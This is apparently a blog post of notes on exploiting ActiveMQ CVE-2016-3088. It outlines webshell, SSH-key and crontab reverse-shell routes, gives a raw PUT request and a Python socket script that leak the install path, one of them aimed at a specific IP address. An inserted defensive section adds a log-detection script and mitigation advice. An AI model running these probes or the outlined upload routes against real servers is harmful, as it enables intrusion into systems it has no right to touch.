ActiveMQ (CVE-2016-3088) Remote Code Execution Notes

Please credit the source when reposting: https://youngrichog.github.io/

Two cases:

  1. With credentials
  2. Without credentials

With credentials

  • webshell

  • ssh public key

  • crontab

  • combined with CVE-2015-5254

    ...

With credentials, the absolute installation path can be read by visiting /admin/test/systemProperties.jsp.

Then PUT the file directly. Because JSP is not executed under the fileserver directory, the file has to be MOVEd into the admin directory, which is only reachable after logging in.

On Apache ActiveMQ 5.7 and below, the absolute path can also be disclosed with the following request:

PUT /fileserver/%20/%20 HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1


One more point worth noting, something I ran into while writing code.

Request

PUT /fileserver/%20/%20 HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

Response

HTTP/1.1 500 /asd/application_install/apache-activemq-5.9.1/webapps/fileserver/ /  (Not a directory)
Connection: close
Server: Jetty(7.6.9.v20130131)

I want to extract the /asd/application_install/apache-activemq-5.9.1/webapps/fileserver/ part. I don't know how to get it with requests and will look into that later, so for now I use a socket to fetch it.

#! /usr/bin/env python3
# -*- coding:utf-8 -*-

import socket

sock = socket.socket()
sock.connect(('ip', 8161))  # change ip and port to the target
# HTTP/1.0 with no keep-alive, so the server closes the connection after replying
request = 'PUT /fileserver/%20/%20 HTTP/1.0\r\nHost: 149.129.130.83:8161\r\n\r\n'
sock.sendall(request.encode('utf-8'))
# the reason phrase of the 500 status line is where the absolute path shows up
res = sock.recv(4096)
sock.close()
print(res.decode('utf-8'))
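As an added defender-side example that is not part of the original post, the following Python flags the two request patterns described above, PUT/MOVE writes under /fileserver/ and 500 responses on that path (the ones whose reason phrase discloses the install directory), in web-console access-log lines. It assumes the console's request log is in NCSA combined format; the sample lines are constructed.

```python
#!/usr/bin/env python3
"""Flag ActiveMQ fileserver write/probe activity in web-console access logs."""
import re
from typing import Dict, List

# Constructed sample lines in NCSA combined format; this assumes the
# console's request log is configured to emit that format.
SAMPLE_LOG = """\
192.0.2.10 - - [10/Oct/2019:13:55:36 +0000] "GET /admin/ HTTP/1.1" 200 4521 "-" "Mozilla/5.0"
192.0.2.77 - - [10/Oct/2019:13:56:01 +0000] "PUT /fileserver/%20/%20 HTTP/1.1" 500 0 "-" "Mozilla/5.0"
192.0.2.77 - - [10/Oct/2019:13:56:09 +0000] "PUT /fileserver/x.txt HTTP/1.1" 204 0 "-" "python-requests/2.22.0"
192.0.2.77 - - [10/Oct/2019:13:56:12 +0000] "MOVE /fileserver/x.txt HTTP/1.1" 204 0 "-" "python-requests/2.22.0"
192.0.2.10 - - [10/Oct/2019:13:57:00 +0000] "GET /fileserver/readme.txt HTTP/1.1" 200 120 "-" "Mozilla/5.0"
"""

# Only the fields needed here: client, timestamp, method, path, status.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)

# Methods the post shows being used to create and relocate files under /fileserver/.
WRITE_METHODS = {"PUT", "MOVE"}


def flag_fileserver_activity(log_text: str) -> List[Dict[str, object]]:
    """Return one finding per suspicious request against /fileserver/."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m or not m["path"].startswith("/fileserver/"):
            continue
        tags = []
        if m["method"] in WRITE_METHODS:
            tags.append("fileserver-write")
        # A 500 on this path is the response whose reason phrase leaks the
        # install directory, so treat it as a path-disclosure probe.
        if m["status"] == "500":
            tags.append("path-disclosure-probe")
        if tags:
            findings.append({"ip": m["ip"], "ts": m["ts"], "method": m["method"],
                             "path": m["path"], "status": int(m["status"]),
                             "tags": tags})
    return findings


if __name__ == "__main__":
    for f in flag_fileserver_activity(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} {f['method']} {f['path']} {f['status']} {f['tags']}")
```

Any PUT or MOVE to /fileserver/ from an unexpected client is worth an alert on its own; restricting or removing the fileserver webapp (as later ActiveMQ releases did) removes the write primitive entirely.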


Without credentials

  • ssh public key
  • crontab

Without credentials, the only options are writing an SSH public key or scheduling a reverse shell via crontab.

Just a quick note :-)